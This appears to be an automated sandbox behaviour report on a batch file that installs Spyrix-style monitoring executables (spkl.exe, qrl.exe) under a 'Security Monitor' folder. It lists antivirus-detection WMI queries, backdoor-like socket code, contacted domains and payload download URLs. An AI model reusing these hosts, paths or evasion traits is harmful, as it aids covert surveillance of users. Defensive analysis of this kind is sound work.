Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: \Device\CdRom0\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: \Device\CdRom0\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: \Device\CdRom0\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: \Device\CdRom0\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: \Device\CdRom0\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: \Device\CdRom0\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: \Device\CdRom0\ VolumeInformation

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 53_2_033CD280 GetLocalTime,

53_2_033CD280

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 53_2_033F05CC GetVersionExA,GetVersionExA,

53_2_033F05CC

Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\SysWOW64\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntivirusProduct

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Code function: 67_2_00D252B0 setsockopt,_errno,_errno,_errno,strlen,memset,strncmp,strncmp,htons,WSAGetLastError,setsockopt,WSAIoctl,WSAGetLastError,strchr,htons,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,WSAGetLastError,connect,htons,atoi,

67_2_00D252B0

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.185.228	www.google.com	United States	15169	GOOGLEUS	false
167.114.14.168	swtb-download.spyrix-sfk.com	Canada	16276	OVHFR	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
158.69.117.119	spyrix.net	Canada	16276	OVHFR	false
167.114.14.170	cdnbaynet.com	Canada	16276	OVHFR	false
95.181.182.182	cl-e0469d03.edgecdn.ru	Russian Federation	200557	REGION40RU	false
23.109.93.100	filedn.com	Netherlands	7979	SERVERS-COMUS	false

Private

IP
192.168.2.4
127.0.0.1

Contacted Domains

Name	IP	Active
swtb-download.spyrix-sfk.com	167.114.14.168	true
spyrix.net	158.69.117.119	true
dashboard.spyrix.com	158.69.117.119	true
www.google.com	142.250.185.228	true
filedn.com	23.109.93.100	true
cl-e0469d03.edgecdn.ru	95.181.182.182	true
cdnbaynet.com	167.114.14.170	true
cdn.cdndownload.net	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://Spyrix.net/dashboard/prg-list	false
https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/s108	false
https://spyrix.net/dashboard/prg-actions	false
https://dashboard.spyrix.com/cdn.js	false
https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.js	false
https://cdn.cdndownload.net/dashboard30/assets/Modal-04ffda94.css	false
https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404	false
https://cdn.cdndownload.net/dashboard30/assets/Copyright.vue_vue_type_script_setup_true_lang-05301fe7.js	false
https://cdn.cdndownload.net/dashboard30/assets/Nunito-Regular-73dcaa51.woff2	false
https://cdn.cdndownload.net/dashboard30/assets/ButtonText.vue_vue_type_script_setup_true_lang-1bda6e81.js	false
https://cdn.cdndownload.net/dashboard30/assets/ButtonTemplate.module-c837805f.js	false
https://cdn.cdndownload.net/dashboard30/assets/Button-ca236c00.css	false
https://cdn.cdndownload.net/dashboard30/assets/en-5393c481.js	false
https://cdn.cdndownload.net/dashboard30/assets/Input.vue_vue_type_script_setup_true_lang-31858815.js	false
https://cdn.cdndownload.net/dashboard30/assets/Button.module-6d4e91b8.js	false
https://cdn.cdndownload.net/dashboard30/assets/ButtonText-ead06ca1.css	false

AV Detection

Multi AV Scanner detection for submitted file

Source: c5WMpr1cOc.bat	Virustotal: Detection: 19%			Perma Link
Source: c5WMpr1cOc.bat	ReversingLabs: Detection: 26%

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D3C770 memset,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	67_2_00D3C770
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D3A91C strtol,strchr,strlen,strncpy,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strchr,strchr,strncmp,strncmp,strncmp,strncmp,strncmp,strncmp,strncmp,strncmp,strchr,strlen,CertOpenStore,CryptStringToBinaryA,CertFindCertificateInStore,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,GetLastError,	67_2_00D3A91C
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 67_2_00D39BC0 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	67_2_00D39BC0

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: -----BEGIN PUBLIC KEY-----		67_2_00D38FA0
Source: qrl.exe	Binary or memory string: -----BEGIN PUBLIC KEY-----

HTML body contains low number of good links

Source: https://dashboard.spyrix.com/login

HTTP Parser: Number of links: 0

HTML body contains password input but no form action

Source: https://dashboard.spyrix.com/login

HTTP Parser: <input type="password" .../> found but no <form action="...

HTML title does not match URL

Source: https://dashboard.spyrix.com/login

HTTP Parser: Title: Welcome Back does not match URL

Source: https://dashboard.spyrix.com/login

HTTP Parser: <input type="password" .../> found

Source: https://dashboard.spyrix.com/login

HTTP Parser: No <meta name="author".. found

Source: https://dashboard.spyrix.com/login

HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 23.109.93.100:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.109.93.100:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.114.14.170:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.114.14.168:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49751 version: TLS 1.2

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_0040AC68 FindFirstFileW,FindClose,	53_2_0040AC68
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_0040A700 lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,	53_2_0040A700
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033C75E8 FindFirstFileA,	53_2_033C75E8
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: 53_2_033C76C4 FindFirstFileA,GetLastError,	53_2_033C76C4

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov eax, edx	67_2_00D2B510
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then cmp dword ptr [edi+04h], ebp	67_2_00D248F0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push esi	67_2_00D220F0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then add eax, dword ptr [ecx+10h]	67_2_00D8C0F0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then movzx edx, byte ptr [ecx]	67_2_00D85060
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov ecx, eax	67_2_00D7F270
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push dword ptr [ebx]	67_2_00D333B0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	67_2_00D26370
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov edi, dword ptr [ebx]	67_2_00D27360
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov byte ptr [edx], cl	67_2_00D65360
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	67_2_00D274E0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	67_2_00D276C1
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 0000000Ch	67_2_00D336A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000019h	67_2_00D336A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	67_2_00D27641
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	67_2_00D277DB
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	67_2_00D2774F
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	67_2_00D27771
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov ebx, dword ptr [edi-04h]	67_2_00D7E8A0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	67_2_00D278AB
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	67_2_00D2785D
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	67_2_00D27828
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	67_2_00D279B7
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	67_2_00D27959
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	67_2_00D27924
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov ebx, ebp	67_2_00D3DAD0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	67_2_00D3DAD0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then test ebp, ebp	67_2_00D38AE0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	67_2_00D27A9B
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	67_2_00D27A5E
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov eax, dword ptr [edi]	67_2_00D15A00
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then test ebp, ebp	67_2_00D38BD0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	67_2_00D27B8D
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	67_2_00D27BAC
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov ebx, dword ptr [esi]	67_2_00D53C90
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then cmp esi, edi	67_2_00D66C00
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov ebp, dword ptr [ebx+58h]	67_2_00D7ADE0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push 00000000h	67_2_00D27D8F
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then mov edx, dword ptr [esp+74h]	67_2_00D3BD50
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 4x nop then push dword ptr [edi]	67_2_00D68EF0

Networking

Uses netstat to query active network connections and open ports

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat.exe -e

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/s108 HTTP/1.1Host: filedn.comConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
